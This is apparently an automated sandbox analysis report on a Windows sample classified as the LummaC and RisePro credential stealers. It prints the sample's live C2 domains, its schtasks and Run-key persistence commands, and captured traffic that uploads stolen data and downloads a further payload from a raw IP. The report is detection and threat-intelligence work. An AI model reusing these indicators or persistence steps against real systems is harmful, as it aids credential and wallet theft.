Windows Analysis Report
2q45IEa3Ee.exe

Overview

General Information

Sample name:2q45IEa3Ee.exe
renamed because original name is a hash value
Original sample name:4a36fa7c0ccbc6842c541a6439ab545a.exe
Analysis ID:1429253
MD5:4a36fa7c0ccbc6842c541a6439ab545a
SHA1:9257009dd59ac4db2518293bcd46be058d937284
SHA256:ca9b2380df90ac17d8c042db4ab442ffad68cc52cd2e557d855f7d571469198f
Tags:32, exe, trojan
Infos:

Detection

LummaC, RisePro Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
Yara detected RisePro Stealer
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 2q45IEa3Ee.exe (PID: 6736 cmdline: "C:\Users\user\Desktop\2q45IEa3Ee.exe" MD5: 4A36FA7C0CCBC6842C541A6439AB545A)
    • schtasks.exe (PID: 2140 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5500 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • oRkIPIEeryat7GMgjkBr.exe (PID: 7092 cmdline: "C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe" MD5: C60F5FA3A579BCA2C8C377F7E15B2221)
      • RegAsm.exe (PID: 1740 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • MSIUpdaterV202.exe (PID: 8 cmdline: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe MD5: C60F5FA3A579BCA2C8C377F7E15B2221)
    • RegAsm.exe (PID: 5856 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • MSIUpdaterV202.exe (PID: 6804 cmdline: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe MD5: C60F5FA3A579BCA2C8C377F7E15B2221)
    • RegAsm.exe (PID: 5900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • AdobeUpdaterV202.exe (PID: 2708 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe" MD5: C60F5FA3A579BCA2C8C377F7E15B2221)
    • RegAsm.exe (PID: 2128 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • AdobeUpdaterV202.exe (PID: 5316 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe" MD5: C60F5FA3A579BCA2C8C377F7E15B2221)
    • RegAsm.exe (PID: 5948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop", "bordersoarmanusjuw.shop"], "Build id": "H8NgCl--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\uw5Stgma3gbM9Xo4g_6cCoQ.zip | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000B.00000002.1939197101.000000000071D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1824382503.0000000005E26000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security |
Process Memory Space: RegAsm.exe PID: 1740 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: RegAsm.exe PID: 1740 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |

System Summary

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\2q45IEa3Ee.exe, ProcessId: 6736, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c

AV Detection

Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe, Avira: detection malicious, Label: TR/AD.Nekark.sbdpe
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe, Avira: detection malicious, Label: TR/AD.Nekark.sbdpe
Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe, Avira: detection malicious, Label: TR/AD.Nekark.sbdpe
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe, Avira: detection malicious, Label: TR/AD.Nekark.sbdpe
Source: 7.2.RegAsm.exe.400000.0.raw.unpack, Malware Configuration Extractor: LummaC {"C2 url": ["wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop", "bordersoarmanusjuw.shop"], "Build id": "H8NgCl--"}
Source: https://bordersoarmanusjuw.shop:443/api, Virustotal: Detection: 16%
Source: https://bordersoarmanusjuw.shop/, Virustotal: Detection: 16%
Source: https://bordersoarmanusjuw.shop/api, Virustotal: Detection: 16%
Source: https://bordersoarmanusjuw.shop/api(, Virustotal: Detection: 8%
Source: https://bordersoarmanusjuw.shop/0, Virustotal: Detection: 9%
Source: https://bordersoarmanusjuw.shop/#, Virustotal: Detection: 16%
Source: mealplayerpreceodsju.shop, Virustotal: Detection: 18%
Source: economicscreateojsu.shop, Virustotal: Detection: 13%
Source: https://bordersoarmanusjuw.shop/api$, Virustotal: Detection: 13%
Source: http://193.233.132.253/lumma1504.exe, Virustotal: Detection: 22%
Source: https://bordersoarmanusjuw.shop/apie, Virustotal: Detection: 15%
Source: https://bordersoarmanusjuw.shop/apir, Virustotal: Detection: 13%
Source: entitlementappwo.shop, Virustotal: Detection: 17%
Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe, ReversingLabs: Detection: 91%
Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe, Virustotal: Detection: 77%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe, ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe, Virustotal: Detection: 77%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe, ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe, Virustotal: Detection: 77%
Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe, ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe, Virustotal: Detection: 77%
Source: 2q45IEa3Ee.exe, Virustotal: Detection: 23%
Source: 2q45IEa3Ee.exe, ReversingLabs: Detection: 28%
Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe, Joe Sandbox ML: detected
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: wifeplasterbakewis.shop
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: mealplayerpreceodsju.shop
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: bordersoarmanusjuw.shop
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: suitcaseacanehalk.shop
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: absentconvicsjawun.shop
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: pushjellysingeywus.shop
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: economicscreateojsu.shop
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: entitlementappwo.shop
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: bordersoarmanusjuw.shop
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: TeslaBrowser/5.5
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: - Screen Resoluton:
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: - Physical Installed Memory:
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: Workgroup: -
Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: H8NgCl--
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_00415B57 CryptUnprotectData, 7_2_00415B57
Source: 2q45IEa3Ee.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Binary string: C:\ka7c6p6\obj\Release\Question.pdbT2n2 `2_CorExeMainmscoree.dll source: MSIUpdaterV202.exe.0.dr, AdobeUpdaterV202.exe.0.dr, oRkIPIEeryat7GMgjkBr.exe.0.dr, lumma1504[1].exe.0.dr
                  Source: Binary string: D:\TestProject\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdb source: 2q45IEa3Ee.exe
                  Source: Binary string: E:\HD_Audio\VS2005\Resetup\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdbP@n@ `@_CorExeMainmscoree.dll source: 2q45IEa3Ee.exe
                  Source: Binary string: E:\HD_Audio\VS2005\Resetup\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdb source: 2q45IEa3Ee.exe
                  Source: Binary string: D:\TestProject\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdb,ANA @A_CorExeMainmscoree.dll source: 2q45IEa3Ee.exe
                  Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 2q45IEa3Ee.exe, 2q45IEa3Ee.exe, 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmp
                  Source: Binary string: C:\ka7c6p6\obj\Release\Question.pdb source: MSIUpdaterV202.exe.0.dr, AdobeUpdaterV202.exe.0.dr, oRkIPIEeryat7GMgjkBr.exe.0.dr, lumma1504[1].exe.0.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: number of queries: 2357
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Code function: 0_2_00D52870 FindFirstFileA,FindNextFileA,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,CreateDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 0_2_00D52870
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Code function: 0_2_00C8C82B FindFirstFileExW,GetLastError, 0_2_00C8C82B

                  Networking

                  Source: Traffic Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.4:49732 -> 193.233.132.253:50500
                  Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.253:50500 -> 192.168.2.4:49732
                  Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.4:49732 -> 193.233.132.253:50500
                  Source: Traffic Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 193.233.132.253:50500 -> 192.168.2.4:49732
                  Source: Traffic Snort IDS: 2052033 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (bordersoarmanusjuw .shop) 192.168.2.4:52093 -> 1.1.1.1:53
                  Source: Traffic Snort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49742 -> 172.67.189.66:443
                  Source: global traffic TCP traffic: 192.168.2.4:49732 -> 193.233.132.253:50500
                  Source: Joe Sandbox View IP Address: 34.117.186.192
                  Source: Joe Sandbox View IP Address: 104.26.5.15
                  Source: Joe Sandbox View IP Address: 193.233.132.253
                  Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
                  Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU
                  Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: unknown DNS query: name: ipinfo.io
                  Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
                  Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: bordersoarmanusjuw.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: bordersoarmanusjuw.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18158 Host: bordersoarmanusjuw.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8779 Host: bordersoarmanusjuw.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: bordersoarmanusjuw.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7091 Host: bordersoarmanusjuw.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1411 Host: bordersoarmanusjuw.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 584825 Host: bordersoarmanusjuw.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 584853 Host: bordersoarmanusjuw.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 585358 Host: bordersoarmanusjuw.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1412 Host: bordersoarmanusjuw.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 584522 Host: bordersoarmanusjuw.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1388 Host: bordersoarmanusjuw.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 591259 Host: bordersoarmanusjuw.shop
                  Source: global traffic HTTP traffic detected: HEAD /lumma1504.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 193.233.132.253 Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /lumma1504.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 193.233.132.253 Cache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe | Code function: 0_2_00D32890 recv,setsockopt,0_2_00D32890
                  Source: global traffic | HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1 | Connection: Keep-Alive | Referer: https://ipinfo.io/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: ipinfo.io
                  Source: global traffic | HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: db-ip.com
                  Source: unknown | DNS traffic detected: queries for: ipinfo.io
                  Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: bordersoarmanusjuw.shop
                  Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49733 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49734 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49745 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49746 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49747 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49752 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49753 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49754 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49756 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49757 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49758 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49759 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49760 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49762 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49763 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49764 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49765 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49766 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49767 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49768 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49769 version: TLS 1.2
